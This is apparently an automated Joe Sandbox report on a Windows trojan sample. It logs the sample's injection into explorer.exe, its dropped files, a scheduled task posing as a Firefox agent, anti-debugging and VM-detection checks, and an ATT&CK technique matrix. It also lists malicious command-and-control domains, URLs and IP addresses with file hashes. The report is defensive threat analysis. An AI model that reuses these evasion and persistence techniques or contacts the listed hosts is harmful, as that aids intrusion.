      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\586.exe EEF63539D65A5A8A2285B41A318B495AC283DF69519FBBFE14813B3990F7CFC2
      Source: file.exeReversingLabs: Detection: 43%
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ichffhi C:\Users\user\AppData\Roaming\ichffhi
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\586.exe C:\Users\user\AppData\Local\Temp\586.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\586.exe C:\Users\user\AppData\Local\Temp\586.exeJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ichffhiJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\586.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@37/10
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00656F65 CreateToolhelp32Snapshot,Module32First,0_2_00656F65
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: Binary string: C:\fuw\riboz.pdb source: 586.exe, 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr
      Source: Binary string: C:\tuvapehib\puvomufewade\sehem\jizef.pdb source: file.exe, ichffhi.1.dr
      Source: Binary string: s_C:\fuw\riboz.pdb source: 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr

      Data Obfuscation

      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ichffhiUnpacked PE file: 2.2.ichffhi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E40 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E4F push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E55 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E7F push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F03 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F3B push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC4 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EDA push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE5 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EEB push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EB5 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EBD push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004094C5 push ecx; ret 0_2_004094D8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A900 push edi; ret 0_2_0065A955
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E40 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E4F push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E55 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E7F push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F03 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F3B push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EC4 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EDA push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EE5 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EEB push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EB5 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EBD push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004094C5 push ecx; ret 2_2_004094D8
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004094C5 push ecx; ret 6_2_004094D8
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004135BD LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_004135BD
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ichffhiJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\586.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ichffhi:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: file.exe, 00000000.00000002.378885385.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKRCP
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ichffhiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Windows\explorer.exe TID: 4400Thread sleep count: 664 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 60Thread sleep count: 430 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 60Thread sleep time: -43000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4600Thread sleep count: 428 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4600Thread sleep time: -42800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5912Thread sleep count: 548 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5284Thread sleep count: 358 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5284Thread sleep time: -35800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6096Thread sleep count: 323 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6096Thread sleep time: -32300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\586.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-8932
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 664Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 430Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 428Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 548Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 358Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\586.exeAPI coverage: 6.5 %
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: explorer.exe, 00000001.00000000.376052917.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.362187206.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.349489982.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000001.00000000.376052917.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

      Anti Debugging

      Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Roaming\ichffhi System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_004069E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_004135BD LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_00414D26 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
      Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00656842 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\ichffhi Code function: 2_2_0053092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\ichffhi Code function: 2_2_00530D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\ichffhi Process queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_0040C27F SetUnhandledExceptionFilter
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_00407AAB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_0040B345 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe File created: ichffhi.1.dr
      Source: C:\Windows\explorer.exe Domain query: thepokeway.nl
      Source: C:\Windows\explorer.exe Network Connect: 213.227.155.16 80
      Source: C:\Windows\explorer.exe Domain query: gayworld.at
      Source: C:\Windows\explorer.exe Domain query: disk.yandex.ru
      Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\ichffhi Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\ichffhi Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 2901A18
      Source: C:\Users\user\AppData\Roaming\ichffhi Thread created: unknown EIP: 5331A18
      Source: explorer.exe, 00000001.00000000.376289740.00000000086C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.371618606.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.312031629.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360392080.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.340880524.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.359782286.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311808004.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340352821.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: GetLocaleInfoA (6_2_00415B8C)
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_0040CE4F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
      Source: C:\Users\user\AppData\Local\Temp\586.exe Code function: 6_2_004059A0 GetGeoInfoA,GetLastError,GetGeoInfoA,GetSystemDefaultLCID,GlobalAlloc,VirtualProtect,GetVersion,WriteConsoleW,GetLastError,HeapFree,SetConsoleCursorInfo,FindNextFileA,_fseek,__floor_pentium4,__floor_pentium4,_puts,FoldStringA,_feof,_fsetpos,_fprintf,GetBinaryTypeW,LocalAlloc,GetBinaryTypeW,CreateMutexA,ConvertFiberToThread,SetFileAttributesW,AddAtomA,ConvertFiberToThread,SetFileAttributesW,AddAtomA,SetFileShortNameW,GetFileAttributesExW,GetFileType,WritePrivateProfileStringA,GetFileAttributesExW,GetFileType,LocalAlloc,WritePrivateProfileStringA,DeregisterEventSource,GetConsoleAliasA,FindFirstChangeNotificationA,GetFileAttributesA,SetComputerNameA,FindFirstChangeNotificationA,GetFileAttributesA,SetComputerNameA,SetThreadExecutionState,TlsGetValue,SetTimeZoneInformation,GetFileAttributesW,SetFileShortNameA,LoadLibraryA

      Stealing of Sensitive Information

      Source: Yara match File source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts2
      Native API
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      1
      Input Capture
      1
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium11
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Exploitation for Client Execution
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory431
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager12
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Deobfuscate/Decode Files or Information
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Hidden Files and Directories
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common2
      Obfuscated Files or Information
      Cached Domain Credentials15
      System Information Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Software Packing
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      File Deletion
      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      [Behavior graph (image not preserved): Behavior Graph ID: 719838, Sample: file.exe, Startdate: 10/10/2022, Architecture: WINDOWS, Score: 100]

      Source | Detection | Scanner | Label
      file.exe | 44% | ReversingLabs | Win32.Trojan.Lockbit
      file.exe | 100% | Joe Sandbox ML |

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Roaming\ichffhi | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Temp\586.exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Roaming\ichffhi | 44% | ReversingLabs | Win32.Trojan.Lockbit

      Source | Detection | Scanner | Label
      2.3.ichffhi.5d0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      0.3.file.exe.610000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      2.2.ichffhi.530e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      2.2.ichffhi.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
      0.2.file.exe.600e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

      No Antivirus matches

      Source | Detection | Scanner | Label
      http://ekcentric.com/tmp/ | 0% | URL Reputation | safe
      https://thepokeway.nl/upload/index.php | 0% | URL Reputation | safe
      http://cracker.biz/tmp/ | 0% | URL Reputation | safe
      http://citnet.ru/tmp/ | 0% | URL Reputation | safe
      http://gayworld.at/tmp/ | 0% | URL Reputation | safe

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      thepokeway.nl | 5.135.247.111 | true | true | | unknown
      gayworld.at | 175.120.254.9 | true | true | | unknown
      disk.yandex.ru | 87.250.250.50 | true | false | | high

      Name | Malicious | Antivirus Detection | Reputation
      http://ekcentric.com/tmp/ | true | URL Reputation: safe | unknown
      https://thepokeway.nl/upload/index.php | false | URL Reputation: safe | unknown
      http://cracker.biz/tmp/ | true | URL Reputation: safe | unknown
      https://disk.yandex.ru/d/aS1IzKYGKL0Ctw | false | | high
      http://citnet.ru/tmp/ | true | URL Reputation: safe | unknown
      http://gayworld.at/tmp/ | true | URL Reputation: safe | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.autoitscript.com/autoit3/J | explorer.exe, 00000001.00000000.360118573.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340593765.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmp | false | | high

      IP | Domain | Country | ASN | ASN Name | Malicious
      123.213.233.194 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
      109.102.255.230 | unknown | Romania | 9050 | RTDBucharestRomaniaRO | true
      5.135.247.111 | thepokeway.nl | France | 16276 | OVHFR | true
      195.158.3.162 | unknown | Uzbekistan | 8193 | BRM-ASUZ | true
      211.171.233.129 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
      211.171.233.126 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
      213.227.155.16 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | true
      185.95.186.58 | unknown | Iraq | 34515 | NEXTNET-ASIQ | true
      87.250.250.50 | disk.yandex.ru | Russian Federation | 13238 | YANDEXRU | false
      175.120.254.9 | gayworld.at | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:719838
                Start date and time:2022-10-10 23:18:52 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@4/3@37/10
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 40.7% (good quality ratio 36.1%)
                • Quality average: 67.2%
                • Quality standard deviation: 34.3%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 29
                • Number of non-executed functions: 35
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • VT rate limit hit for: file.exe

      Time | Type | Description
      23:20:39 | Task Scheduler | Run new task: Firefox Default Browser Agent 13C94503BEEACC71 path: C:\Users\user\AppData\Roaming\ichffhi

                Match | Associated Sample Name / URL | Detection
                C:\Users\user\AppData\Local\Temp\586.exe | file.exe | malicious
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:modified
                  Size (bytes):610304
                  Entropy (8bit):7.634117495400957
                  Encrypted:false
                  SSDEEP:12288:3eTPj/Rtci/+NENuoP6nhZMtu5LNHyXfIf9Uk7fchd:3eTPjptci/2A6HaujGfIqqU
                  MD5:5C3FAFBD0E6546D41F902B129CE27E7B
                  SHA1:0D293C11B0F8D1CDB7457810B801B15F920858F9
                  SHA-256:EEF63539D65A5A8A2285B41A318B495AC283DF69519FBBFE14813B3990F7CFC2
                  SHA-512:B2536FCB569465A0B2826509CDEECC15052B4803414A2EEE40CA60299B71817E2565508C96BAB9E1E832F5C22438365AA87AF9481008EE64A4476677DC77BE4E
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Joe Sandbox View:
                  • Filename: file.exe, Detection: malicious, Browse
                  Reputation:low
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):281600
                  Entropy (8bit):6.919008202366728
                  Encrypted:false
                  SSDEEP:3072:SXrv1Mdy3HldT80jg8o5/8R2wwmPKI0qt4G7bKlizcTfmFkyMQM/h3qpZa9uD6Vq:Sz1sy3lXNqwK1qDYi4QrwVfquS
                  MD5:28167CBFD672C0FC70358D19DE3826EB
                  SHA1:92112F7C9A68E28D86C3762871525647F55BB337
                  SHA-256:86533589ED7705B7BB28F85F19E45D9519023BCC53422F33D13B6023BAB7AB21
                  SHA-512:AA50669922C80477EE049A9C8EBE7F1D16BE7ACEAABDC4CA70889C53226A6759F04028D9AADD957AEC9D4C13672A0A2E0F70A59425FA4D117B042FDB1B6A22DF
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 44%
                  Reputation:low
